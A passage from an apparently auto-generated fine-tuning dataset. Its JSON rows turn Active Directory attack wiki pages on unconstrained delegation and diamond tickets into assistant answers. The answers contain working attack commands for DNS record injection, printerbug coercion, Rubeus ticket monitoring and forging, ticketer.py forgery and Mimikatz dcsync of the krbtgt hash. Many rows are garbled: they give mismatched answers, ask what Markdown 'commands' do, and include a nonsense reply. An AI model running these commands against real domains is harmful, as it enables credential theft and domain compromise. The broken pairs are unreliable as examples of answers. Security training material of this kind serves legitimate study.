the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 2. Add a DNS entry for the attacker name set in the SPN added in the target machine account's SPNs during a pentest?", "response": "dnstool.py -u 'DOMAIN\\CompromisedAccont' -p 'LMhash:NThash' -r 'attacker.DOMAIN_FQDN' -d 'attacker_IP' --action add 'DomainController'", "metadata": {"corpus_index": 581, "category": "web", "source_file": "docs/src/ad/movement/kerberos/delegations/unconstrained.md", "page_title": "(KUD) Unconstrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 4.a. either specify the salt and password. krbrelayx will calculate the kerberos keys"}, {"role": "assistant", "content": "krbrelayx.py --krbsalt 'DOMAINusername' --krbpass 'password'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 4.a. either specify the salt and password. krbrelayx will calculate the kerberos keys", "response": "krbrelayx.py --krbsalt 'DOMAINusername' --krbpass 'password'", "metadata": {"corpus_index": 582, "category": "web", "source_file": "docs/src/ad/movement/kerberos/delegations/unconstrained.md", "page_title": "(KUD) Unconstrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 4.a. either specify the salt and password. krbrelayx will calculate the kerberos keys"}, {"role": "assistant", "content": "krbrelayx.py --krbsalt 'DOMAINusername' --krbpass 'password'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 4.a. either specify the salt and password. krbrelayx will calculate the kerberos keys", "response": "krbrelayx.py --krbsalt 'DOMAINusername' --krbpass 'password'", "metadata": {"corpus_index": 582, "category": "web", "source_file": "docs/src/ad/movement/kerberos/delegations/unconstrained.md", "page_title": "(KUD) Unconstrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe PrinterBug, PetitPotam, PrivExchange, ... in the context of penetration testing"}, {"role": "assistant", "content": "printerbug.py domain/'vuln_account$'@'DC_IP' -hashes LM:NT 'DomainController'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe PrinterBug, PetitPotam, PrivExchange, ... in the context of penetration testing", "response": "printerbug.py domain/'vuln_account$'@'DC_IP' -hashes LM:NT 'DomainController'", "metadata": {"corpus_index": 583, "category": "web", "source_file": "docs/src/ad/movement/kerberos/delegations/unconstrained.md", "page_title": "(KUD) Unconstrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for PrinterBug, PetitPotam, PrivExchange, ..."}, {"role": "assistant", "content": "printerbug.py domain/'vuln_account$'@'DC_IP' -hashes LM:NT 'DomainController'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for PrinterBug, PetitPotam, PrivExchange, ...", "response": "printerbug.py domain/'vuln_account$'@'DC_IP' -hashes LM:NT 'DomainController'", "metadata": {"corpus_index": 583, "category": "web", "source_file": "docs/src/ad/movement/kerberos/delegations/unconstrained.md", "page_title": "(KUD) Unconstrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of There should be a krbtgt ccache file in the current directory. And it can be used by"}, {"role": "assistant", "content": "export KRB5CCNAME=pwd/'krbtgt.ccache'\n``\n\n> [!CAUTION]\n> In case, for some reason, attacking a Domain Controller doesn't work (i.e. error sayingCiphertext integrity failed.) try to attack others (if you're certain the credentials you supplied were correct). Some replication and propagation issues could get in the way.\n\nOnce the krbrelayx listener is ready, an authentication coercion attack (e.g. PrinterBug, PrivExchange, PetitPotam) can be operated. The listener will then receive a Kerberos authentication, hence a ST, containing a TGT.\n\nThe TGT will then be usable with Pass the Ticket (to act as the victim) or with S4U2self abuse (to obtain local admin privileges over the victim).\n\n=== From the compromised computer (Windows)\n\nOnce the KUD capable host is compromised, Rubeus can be used (on the compromised host) as a listener to wait for a user to authenticate, the ST to show up and to extract the TGT it contains.\n\n`bash\nRubeus.exe monitor /interval:5\n`\n\nOnce the monitor is ready, a forced authentication attack (e.g. PrinterBug, PrivExchange) can be operated. Rubeus will then receive an authentication (hence a Service Ticket, containing a TGT). The TGT can be used to request a Service Ticket for another service.\n\n`bash\nRubeus.exe asktgs /ticket:$base64_extracted_TGT /service:$target_SPN /ptt\n`\n\nAlternatively, the TGT can be used with S4U2self abuse in order to gain local admin privileges over the TGT's owner.\n\nOnce the TGT is injected, it can natively be used when accessing a service. For example, with Mimikatz, to extract the krbtgt hash with lsadump::dcsync.\n\n`bash\nlsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of There should be a krbtgt ccache file in the current directory. And it can be used by", "response": "export KRB5CCNAME=pwd/'krbtgt.ccache'\n``\n\n> [!CAUTION]\n> In case, for some reason, attacking a Domain Controller doesn't work (i.e. error sayingCiphertext integrity failed.) try to attack others (if you're certain the credentials you supplied were correct). Some replication and propagation issues could get in the way.\n\nOnce the krbrelayx listener is ready, an authentication coercion attack (e.g. PrinterBug, PrivExchange, PetitPotam) can be operated. The listener will then receive a Kerberos authentication, hence a ST, containing a TGT.\n\nThe TGT will then be usable with Pass the Ticket (to act as the victim) or with S4U2self abuse (to obtain local admin privileges over the victim).\n\n=== From the compromised computer (Windows)\n\nOnce the KUD capable host is compromised, Rubeus can be used (on the compromised host) as a listener to wait for a user to authenticate, the ST to show up and to extract the TGT it contains.\n\n`bash\nRubeus.exe monitor /interval:5\n`\n\nOnce the monitor is ready, a forced authentication attack (e.g. PrinterBug, PrivExchange) can be operated. Rubeus will then receive an authentication (hence a Service Ticket, containing a TGT). The TGT can be used to request a Service Ticket for another service.\n\n`bash\nRubeus.exe asktgs /ticket:$base64_extracted_TGT /service:$target_SPN /ptt\n`\n\nAlternatively, the TGT can be used with S4U2self abuse in order to gain local admin privileges over the TGT's owner.\n\nOnce the TGT is injected, it can natively be used when accessing a service. For example, with Mimikatz, to extract the krbtgt hash with lsadump::dcsync.\n\n`bash\nlsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt\n``\n\n:::", "metadata": {"corpus_index": 584, "category": "web", "source_file": "docs/src/ad/movement/kerberos/delegations/unconstrained.md", "page_title": "(KUD) Unconstrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through There should be a krbtgt ccache file in the current directory. And it can be used by"}, {"role": "assistant", "content": "export KRB5CCNAME=pwd/'krbtgt.ccache'\n``\n\n> [!CAUTION]\n> In case, for some reason, attacking a Domain Controller doesn't work (i.e. error sayingCiphertext integrity failed.) try to attack others (if you're certain the credentials you supplied were correct). Some replication and propagation issues could get in the way.\n\nOnce the krbrelayx listener is ready, an authentication coercion attack (e.g. PrinterBug, PrivExchange, PetitPotam) can be operated. The listener will then receive a Kerberos authentication, hence a ST, containing a TGT.\n\nThe TGT will then be usable with Pass the Ticket (to act as the victim) or with S4U2self abuse (to obtain local admin privileges over the victim).\n\n=== From the compromised computer (Windows)\n\nOnce the KUD capable host is compromised, Rubeus can be used (on the compromised host) as a listener to wait for a user to authenticate, the ST to show up and to extract the TGT it contains.\n\n`bash\nRubeus.exe monitor /interval:5\n`\n\nOnce the monitor is ready, a forced authentication attack (e.g. PrinterBug, PrivExchange) can be operated. Rubeus will then receive an authentication (hence a Service Ticket, containing a TGT). The TGT can be used to request a Service Ticket for another service.\n\n`bash\nRubeus.exe asktgs /ticket:$base64_extracted_TGT /service:$target_SPN /ptt\n`\n\nAlternatively, the TGT can be used with S4U2self abuse in order to gain local admin privileges over the TGT's owner.\n\nOnce the TGT is injected, it can natively be used when accessing a service. For example, with Mimikatz, to extract the krbtgt hash with lsadump::dcsync.\n\n`bash\nlsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through There should be a krbtgt ccache file in the current directory. And it can be used by", "response": "export KRB5CCNAME=pwd/'krbtgt.ccache'\n``\n\n> [!CAUTION]\n> In case, for some reason, attacking a Domain Controller doesn't work (i.e. error sayingCiphertext integrity failed.) try to attack others (if you're certain the credentials you supplied were correct). Some replication and propagation issues could get in the way.\n\nOnce the krbrelayx listener is ready, an authentication coercion attack (e.g. PrinterBug, PrivExchange, PetitPotam) can be operated. The listener will then receive a Kerberos authentication, hence a ST, containing a TGT.\n\nThe TGT will then be usable with Pass the Ticket (to act as the victim) or with S4U2self abuse (to obtain local admin privileges over the victim).\n\n=== From the compromised computer (Windows)\n\nOnce the KUD capable host is compromised, Rubeus can be used (on the compromised host) as a listener to wait for a user to authenticate, the ST to show up and to extract the TGT it contains.\n\n`bash\nRubeus.exe monitor /interval:5\n`\n\nOnce the monitor is ready, a forced authentication attack (e.g. PrinterBug, PrivExchange) can be operated. Rubeus will then receive an authentication (hence a Service Ticket, containing a TGT). The TGT can be used to request a Service Ticket for another service.\n\n`bash\nRubeus.exe asktgs /ticket:$base64_extracted_TGT /service:$target_SPN /ptt\n`\n\nAlternatively, the TGT can be used with S4U2self abuse in order to gain local admin privileges over the TGT's owner.\n\nOnce the TGT is injected, it can natively be used when accessing a service. For example, with Mimikatz, to extract the krbtgt hash with lsadump::dcsync.\n\n`bash\nlsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt\n``\n\n:::", "metadata": {"corpus_index": 584, "category": "web", "source_file": "docs/src/ad/movement/kerberos/delegations/unconstrained.md", "page_title": "(KUD) Unconstrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out There should be a krbtgt ccache file in the current directory. And it can be used by during a pentest?"}, {"role": "assistant", "content": "> [!CAUTION]\n> In case, for some reason, attacking a Domain Controller doesn't work (i.e. error saying`Ciphertext integrity failed.`) try to attack others (if you're certain the credentials you supplied were correct). Some replication and propagation issues could get in the way.\n\nOnce the krbrelayx listener is ready, an [authentication coercion attack](../../mitm-and-coerced-authentications/) (e.g. [PrinterBug](../../mitm-and-coerced-authentications/#ms-rprn-abuse-a-k-a-printer-bug), [PrivExchange](../../mitm-and-coerced-authentications/#pushsubscription-abuse-a-k-a-privexchange), [PetitPotam](../../mitm-and-coerced-authentications/ms-efsr.md)) can be operated. The listener will then receive a Kerberos authentication, hence a ST, containing a TGT.\n\nThe TGT will then be usable with [Pass the Ticket](../ptt.md) (to act as the victim) or with [S4U2self abuse](s4u2self-abuse.md) (to obtain local admin privileges over the victim).\n\n\n=== From the compromised computer (Windows)\n\nOnce the KUD capable host is compromised, [Rubeus](https://github.com/GhostPack/Rubeus) can be used (on the compromised host) as a listener to wait for a user to authenticate, the ST to show up and to extract the TGT it contains."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out There should be a krbtgt ccache file in the current directory. And it can be used by during a pentest?", "response": "> [!CAUTION]\n> In case, for some reason, attacking a Domain Controller doesn't work (i.e. error saying`Ciphertext integrity failed.`) try to attack others (if you're certain the credentials you supplied were correct). Some replication and propagation issues could get in the way.\n\nOnce the krbrelayx listener is ready, an [authentication coercion attack](../../mitm-and-coerced-authentications/) (e.g. [PrinterBug](../../mitm-and-coerced-authentications/#ms-rprn-abuse-a-k-a-printer-bug), [PrivExchange](../../mitm-and-coerced-authentications/#pushsubscription-abuse-a-k-a-privexchange), [PetitPotam](../../mitm-and-coerced-authentications/ms-efsr.md)) can be operated. The listener will then receive a Kerberos authentication, hence a ST, containing a TGT.\n\nThe TGT will then be usable with [Pass the Ticket](../ptt.md) (to act as the victim) or with [S4U2self abuse](s4u2self-abuse.md) (to obtain local admin privileges over the victim).\n\n\n=== From the compromised computer (Windows)\n\nOnce the KUD capable host is compromised, [Rubeus](https://github.com/GhostPack/Rubeus) can be used (on the compromised host) as a listener to wait for a user to authenticate, the ST to show up and to extract the TGT it contains.", "metadata": {"corpus_index": 585, "category": "web", "source_file": "docs/src/ad/movement/kerberos/delegations/unconstrained.md", "page_title": "(KUD) Unconstrained", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> [!CAUTION]`?"}, {"role": "assistant", "content": "This command is used for there should be a krbtgt ccache file in the current directory. and it can be used by. There should be a krbtgt ccache file in the current directory. And it can be used by"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> [!CAUTION]`?", "response": "This command is used for there should be a krbtgt ccache file in the current directory. and it can be used by. There should be a krbtgt ccache file in the current directory. And it can be used by", "metadata": {"corpus_index": 585, "category": "web", "source_file": "docs/src/ad/movement/kerberos/delegations/unconstrained.md", "page_title": "(KUD) Unconstrained", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use Once for there should be a krbtgt ccache file in the current directory. and it can be used by?"}, {"role": "assistant", "content": "Once the monitor is ready, a [forced authentication attack](../../mitm-and-coerced-authentications/) (e.g. [PrinterBug](../../mitm-and-coerced-authentications/#ms-rprn-abuse-a-k-a-printer-bug), [PrivExchange](../../mitm-and-coerced-authentications/#pushsubscription-abuse-a-k-a-privexchange)) can be operated. Rubeus will then receive an authentication (hence a Service Ticket, containing a TGT). The TGT can be used to request a Service Ticket for another service."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use Once for there should be a krbtgt ccache file in the current directory. and it can be used by?", "response": "Once the monitor is ready, a [forced authentication attack](../../mitm-and-coerced-authentications/) (e.g. [PrinterBug](../../mitm-and-coerced-authentications/#ms-rprn-abuse-a-k-a-printer-bug), [PrivExchange](../../mitm-and-coerced-authentications/#pushsubscription-abuse-a-k-a-privexchange)) can be operated. Rubeus will then receive an authentication (hence a Service Ticket, containing a TGT). The TGT can be used to request a Service Ticket for another service.", "metadata": {"corpus_index": 586, "category": "web", "source_file": "docs/src/ad/movement/kerberos/delegations/unconstrained.md", "page_title": "(KUD) Unconstrained", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Once"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for There should be a krbtgt ccache file in the current directory. And it can be used by?"}, {"role": "assistant", "content": "Once the monitor is ready, a [forced authentication attack](../../mitm-and-coerced-authentications/) (e.g. [PrinterBug](../../mitm-and-coerced-authentications/#ms-rprn-abuse-a-k-a-printer-bug), [PrivExchange](../../mitm-and-coerced-authentications/#pushsubscription-abuse-a-k-a-privexchange)) can be operated. Rubeus will then receive an authentication (hence a Service Ticket, containing a TGT). The TGT can be used to request a Service Ticket for another service."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for There should be a krbtgt ccache file in the current directory. And it can be used by?", "response": "Once the monitor is ready, a [forced authentication attack](../../mitm-and-coerced-authentications/) (e.g. [PrinterBug](../../mitm-and-coerced-authentications/#ms-rprn-abuse-a-k-a-printer-bug), [PrivExchange](../../mitm-and-coerced-authentications/#pushsubscription-abuse-a-k-a-privexchange)) can be operated. Rubeus will then receive an authentication (hence a Service Ticket, containing a TGT). The TGT can be used to request a Service Ticket for another service.", "metadata": {"corpus_index": 586, "category": "web", "source_file": "docs/src/ad/movement/kerberos/delegations/unconstrained.md", "page_title": "(KUD) Unconstrained", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute There should be a krbtgt ccache file in the current directory. And it can be used by?"}, {"role": "assistant", "content": "Alternatively, the TGT can be used with [S4U2self abuse](s4u2self-abuse.md) in order to gain local admin privileges over the TGT's owner.\n\nOnce the TGT is injected, it can natively be used when accessing a service. For example, with [Mimikatz](https://github.com/gentilkiwi/mimikatz), to extract the `krbtgt` hash with [`lsadump::dcsync`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/dcsync)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute There should be a krbtgt ccache file in the current directory. And it can be used by?", "response": "Alternatively, the TGT can be used with [S4U2self abuse](s4u2self-abuse.md) in order to gain local admin privileges over the TGT's owner.\n\nOnce the TGT is injected, it can natively be used when accessing a service. For example, with [Mimikatz](https://github.com/gentilkiwi/mimikatz), to extract the `krbtgt` hash with [`lsadump::dcsync`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/dcsync).", "metadata": {"corpus_index": 587, "category": "web", "source_file": "docs/src/ad/movement/kerberos/delegations/unconstrained.md", "page_title": "(KUD) Unconstrained", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Alternatively, the TGT can be used with [S4U2self abuse](s4u2self-abuse.md) in order to gain local admin privileges over the TGT's owner.`?"}, {"role": "assistant", "content": "This command is used for there should be a krbtgt ccache file in the current directory. and it can be used by. There should be a krbtgt ccache file in the current directory. And it can be used by"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Alternatively, the TGT can be used with [S4U2self abuse](s4u2self-abuse.md) in order to gain local admin privileges over the TGT's owner.`?", "response": "This command is used for there should be a krbtgt ccache file in the current directory. and it can be used by. There should be a krbtgt ccache file in the current directory. And it can be used by", "metadata": {"corpus_index": 587, "category": "web", "source_file": "docs/src/ad/movement/kerberos/delegations/unconstrained.md", "page_title": "(KUD) Unconstrained", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Diamond tickets - Theory"}, {"role": "assistant", "content": "Golden and Silver tickets can usually be detected by probes that monitor the service ticket requests (KRB_TGS_REQ) that have no corresponding TGT requests (KRB_AS_REQ). Those types of tickets also feature forged PACs that sometimes fail at mimicking real ones, thus increasing their detection rates. Diamond tickets can be a useful alternative in the way they simply request a normal ticket, decrypt the PAC, modify it, recalculate the signatures and encrypt it again. It requires knowledge of the target service long-term key (can be the krbtgt for a TGT, or a target service for a Service Ticket)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Diamond tickets - Theory", "response": "Golden and Silver tickets can usually be detected by probes that monitor the service ticket requests (KRB_TGS_REQ) that have no corresponding TGT requests (KRB_AS_REQ). Those types of tickets also feature forged PACs that sometimes fail at mimicking real ones, thus increasing their detection rates. Diamond tickets can be a useful alternative in the way they simply request a normal ticket, decrypt the PAC, modify it, recalculate the signatures and encrypt it again. It requires knowledge of the target service long-term key (can be the krbtgt for a TGT, or a target service for a Service Ticket).", "metadata": {"corpus_index": 588, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/diamond.md", "page_title": "Diamond tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Diamond tickets - Theory"}, {"role": "assistant", "content": "Golden and Silver tickets can usually be detected by probes that monitor the service ticket requests (KRB_TGS_REQ) that have no corresponding TGT requests (KRB_AS_REQ). Those types of tickets also feature forged PACs that sometimes fail at mimicking real ones, thus increasing their detection rates. Diamond tickets can be a useful alternative in the way they simply request a normal ticket, decrypt the PAC, modify it, recalculate the signatures and encrypt it again. It requires knowledge of the target service long-term key (can be the krbtgt for a TGT, or a target service for a Service Ticket)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Diamond tickets - Theory", "response": "Golden and Silver tickets can usually be detected by probes that monitor the service ticket requests (KRB_TGS_REQ) that have no corresponding TGT requests (KRB_AS_REQ). Those types of tickets also feature forged PACs that sometimes fail at mimicking real ones, thus increasing their detection rates. Diamond tickets can be a useful alternative in the way they simply request a normal ticket, decrypt the PAC, modify it, recalculate the signatures and encrypt it again. It requires knowledge of the target service long-term key (can be the krbtgt for a TGT, or a target service for a Service Ticket).", "metadata": {"corpus_index": 588, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/diamond.md", "page_title": "Diamond tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Diamond tickets - Practice"}, {"role": "assistant", "content": "> [!TIP]\n> When forging tickets, before November 2021 updates, the user-id and groups-ids were useful but the username supplied was mostly useless. As of Nov. 2021 updates, if the username supplied doesn't exist in Active Directory, the ticket gets rejected. This also applies to Silver Tickets.\n\nSince Golden and Silver tickets are fully forged are not preceded by legitimate TGT (KRB_AS_REQ) or Service Ticket requests (KRB_TGS_REQ), detection rates are quite high. Diamond tickets are an alternative to obtaining similar tickets in a stealthier way.\n\nIn this scenario, an attacker that has knowledge of the service long-term key (krbtgt keys in case of a TGT, service account keys of Service Tickets) can request a legitimate ticket, decrypt the PAC, modify it, recalculate the signatures and encrypt the ticket again. This technique allows to produce a PAC that is highly similar to a legitimate one and also produces legitimate requests.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's ticketer (Python) script can be used for such purposes.\n\nIn its actual form (as of September 9th, 2022), the script doesn't modify the PAC in the ticket obtained but instead fully replaces it with a full-forged one. This is not the most stealthy approach as the forged PAC could embed wrong information. Testers are advised to opt for the sapphire ticket approach. On top of that, if there are some structure in the PAC that Impacket can't handle, those structures will be missing in the newly forged PAC.\n\n``bash\nticketer.py -request -domain \"$DOMAIN\" -user \"$USER\" -password \"$PASSWORD\" -nthash 'krbtgt/service NT hash' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' -user-id '1337' -groups '512,513,518,519,520' 'baduser'\n`\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used for such purposes since PR#136.\n\n`powershell\nRubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTROLLER /enctype:AES256 /krbkey:HASH /ticketuser:USERNAME /ticketuserid:U"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Diamond tickets - Practice", "response": "> [!TIP]\n> When forging tickets, before November 2021 updates, the user-id and groups-ids were useful but the username supplied was mostly useless. As of Nov. 2021 updates, if the username supplied doesn't exist in Active Directory, the ticket gets rejected. This also applies to Silver Tickets.\n\nSince Golden and Silver tickets are fully forged are not preceded by legitimate TGT (KRB_AS_REQ) or Service Ticket requests (KRB_TGS_REQ), detection rates are quite high. Diamond tickets are an alternative to obtaining similar tickets in a stealthier way.\n\nIn this scenario, an attacker that has knowledge of the service long-term key (krbtgt keys in case of a TGT, service account keys of Service Tickets) can request a legitimate ticket, decrypt the PAC, modify it, recalculate the signatures and encrypt the ticket again. This technique allows to produce a PAC that is highly similar to a legitimate one and also produces legitimate requests.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's ticketer (Python) script can be used for such purposes.\n\nIn its actual form (as of September 9th, 2022), the script doesn't modify the PAC in the ticket obtained but instead fully replaces it with a full-forged one. This is not the most stealthy approach as the forged PAC could embed wrong information. Testers are advised to opt for the sapphire ticket approach. On top of that, if there are some structure in the PAC that Impacket can't handle, those structures will be missing in the newly forged PAC.\n\n``bash\nticketer.py -request -domain \"$DOMAIN\" -user \"$USER\" -password \"$PASSWORD\" -nthash 'krbtgt/service NT hash' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' -user-id '1337' -groups '512,513,518,519,520' 'baduser'\n`\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used for such purposes since PR#136.\n\n`powershell\nRubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTROLLER /enctype:AES256 /krbkey:HASH /ticketuser:USERNAME /ticketuserid:U", "metadata": {"corpus_index": 589, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/diamond.md", "page_title": "Diamond tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Diamond tickets - Practice"}, {"role": "assistant", "content": "> [!TIP]\n> When forging tickets, before November 2021 updates, the user-id and groups-ids were useful but the username supplied was mostly useless. As of Nov. 2021 updates, if the username supplied doesn't exist in Active Directory, the ticket gets rejected. This also applies to Silver Tickets.\n\nSince Golden and Silver tickets are fully forged are not preceded by legitimate TGT (KRB_AS_REQ) or Service Ticket requests (KRB_TGS_REQ), detection rates are quite high. Diamond tickets are an alternative to obtaining similar tickets in a stealthier way.\n\nIn this scenario, an attacker that has knowledge of the service long-term key (krbtgt keys in case of a TGT, service account keys of Service Tickets) can request a legitimate ticket, decrypt the PAC, modify it, recalculate the signatures and encrypt the ticket again. This technique allows to produce a PAC that is highly similar to a legitimate one and also produces legitimate requests.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's ticketer (Python) script can be used for such purposes.\n\nIn its actual form (as of September 9th, 2022), the script doesn't modify the PAC in the ticket obtained but instead fully replaces it with a full-forged one. This is not the most stealthy approach as the forged PAC could embed wrong information. Testers are advised to opt for the sapphire ticket approach. On top of that, if there are some structure in the PAC that Impacket can't handle, those structures will be missing in the newly forged PAC.\n\n``bash\nticketer.py -request -domain \"$DOMAIN\" -user \"$USER\" -password \"$PASSWORD\" -nthash 'krbtgt/service NT hash' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' -user-id '1337' -groups '512,513,518,519,520' 'baduser'\n`\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used for such purposes since PR#136.\n\n`powershell\nRubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTROLLER /enctype:AES256 /krbkey:HASH /ticketuser:USERNAME /ticketuserid:U"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", 